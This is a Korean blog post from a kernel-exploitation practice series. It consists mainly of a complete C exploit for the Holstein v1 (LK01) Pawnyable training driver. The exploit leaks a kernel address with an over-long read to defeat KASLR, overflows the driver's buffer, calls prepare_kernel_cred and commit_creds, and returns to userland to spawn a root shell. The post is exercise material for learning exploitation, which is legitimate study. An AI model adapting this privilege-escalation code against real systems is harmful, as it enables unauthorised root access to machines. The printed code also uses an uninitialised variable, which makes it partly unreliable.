kernel exploit payload - kaslr

2025. 5. 30. 12:05·Kernel Exploit/Exercise
728x90
반응형

서론

[ Holstein v1 (LK01) - Pawnyable ] 기준으로 작성하였다.

주소 랜덤화 시 read를 통한 필요 주소 leak 후 offset을 계산하여 이를 적용한다.

즉, 우선 kaslr을 적용하지 않고 leak, offset을 계산하고 이를 반영하면 된다.

 

Payload

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int kbuf_size = 0x400;
int global_fd;

void open_dev()
{
	global_fd = open("/dev/holstein", O_RDWR);
    if (global_fd < 0)
    {
    puts("[!] Failed to open device");
    exit(-1);
 	}
    else
    {
    puts("[*] Opened device");
    }
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

void save_state(void)
{
	__asm__ __volatile__(
    "mov %cs, user_cs;"
    "mov %ss, user_ss;"
    "mov %rsp, user_sp;"
    "pushf;"
    "pop user_rflags;"
    );
    puts("[*] Saved state");
}
    
void print_leak(unsigned long *leak, unsigned n)
{
	for (unsigned i = 0; i < n; ++i)
    {
    	printf("%u: %lx\n", i, leak[i]);
    }
}

unsigned long leak;

void leak_addr(void)
{
	unsigned long arry[kbuf_size/8 + 100];
    memset(arry,0,sizeof(arry));
    read(global_fd, arry, sizeof(arry));
    leak = arry[kbuf_size/8+1];
    //print_leak(leak, 200);
    printf("[*] Leak: %lx\n", leak);
}

void get_shell(void)
{
	puts("[*] Returned to userland");
    if (getuid() == 0)
    {
    	printf("[*] UID: %d, got root!\n", getuid());
        char *argv[] = { "/bin/sh", NULL };
        char *envp[] = { NULL };
        execve("/bin/sh", argv, envp);
    }
    else
    {
    	printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }
}

unsigned long user_rip = (unsigned long)get_shell;

void restore_state(void)
{
	__asm__ __volatile__(
    "swapgs;"
    "movq user_ss, %r15;"
    "push %r15;"
    "movq user_sp, %r15;"
    "push %r15;"
    "movq user_rflags, %r15;"
    "push %r15;"
    "movq user_cs, %r15;"
    "push %r15;"
    "movq user_rip, %r15;"
    "push %r15;"
    "iretq;"
    );
}

unsigned long prepare_kernel_cred;
unsigned long commit_cred;
unsigned long restore_state_addr = (unsigned long)restore_state;

void escalate_privs(void)
{
	prepare_kernel_cred = leak - 0xcf0fc;
    commit_cred = leak - 0xcefac;
    
	__asm__ __volatile__(
    "movq prepare_kernel_cred, %rax;"
    "xor %rdi, %rdi;"
    "call *%rax;"
    "movq %rax, %rdi;"
    "movq commit_cred, %rax;"
    "call *%rax;"
    "movq restore_state_addr, %rax;"
    "call *%rax;"
    );
}

void exploit()
{
	unsigned long payload[kbuf_size/8+2];
    int offset;
    for(int i =0; i < 128; i++)
    {
    	payload[offset++] = 0xdeadbeefdeadbeef;
    }
    payload[offset++] = 0xaaaaaaaaaaaaaaaa;
    payload[offset++] = (unsigned long)escalate_privs;
    
    unsigned long escal_addr = (unsigned long)escalate_privs;
    
    printf("[*] Prepared payload : escallte_privs addr = %lx\n",escal_addr);
    write(global_fd, payload, sizeof(payload));
    
    puts("[!] Error while exploit");
}

int main()
{
	save_state();
    open_dev();
    leak_addr();
    exploit();
    puts("[!] Error after exploit");
    
    return 0;
}

 

728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'Kernel Exploit > Exercise' 카테고리의 다른 글

kernel exploit / NahamCon 2025 CTF - The jumps  (0) 2025.05.30
kernel exploit payload - krop  (0) 2025.05.30
kernel exploit payload - no mitigation  (0) 2025.05.30
Kernel exploit 기본 setting  (0) 2025.05.28
'Kernel Exploit/Exercise' 카테고리의 다른 글
  • kernel exploit / NahamCon 2025 CTF - The jumps
  • kernel exploit payload - krop
  • kernel exploit payload - no mitigation
  • Kernel exploit 기본 setting
wyv3rn
wyv3rn
아저씨의 흔한 취미. wyv3rn#1249
  • wyv3rn
    think storage
    wyv3rn
  • 전체
    오늘
    어제
    • 분류 전체보기 (505) N
      • To do list (7)
        • Doing (1)
        • Complete (6)
      • Diary (35)
      • Tips & theory (73)
      • Kernel Exploit (27)
        • Theory (15)
        • Exercise (5)
      • File Structure (6)
      • Wargame (313)
        • pwn.college (34)
        • Dreamhack (148)
        • pwnable.kr (15)
        • Lord of Sqlinjection (3)
        • Cryptohack (20)
        • Root me (27)
        • CodeEngn (4)
        • Exploit Education (22)
        • ROP Emporium (8)
        • H4C (10)
        • Hackerchool (22)
      • CTF (44) N
        • Solved (42) N
        • Unsolved (2)
      • Script (0)
      • RubiyaLap (0)
  • 블로그 메뉴

    • 홈
    • 방명록
  • 링크

  • 공지사항

    • PWN wargame 모음 (및 느낀점)
    • 비공개 글들에 대해.
    • 뭐라도 하나 얻어가시길...
  • 인기 글

  • 태그

    RTL
    phoenix
    dreamhack
    FSB
    Buffer Overflow
    32bit
    exploit education
    pwntools
    _IO_FILE
    Me
    cryptohack
    rop
    hackerschool
    BOF
    vtable
    tcache
    root-me
    la ctf
    CANARY
    64bit
    heap
    docker
    lob
    ROOT ME
    x64
    x86
    Format String Bug
    pwnable.kr
    libc
    root
  • 최근 댓글

  • 최근 글

  • 250x250
    반응형
  • hELLO· Designed By정상우.v4.10.3
wyv3rn
kernel exploit payload - kaslr
상단으로

티스토리툴바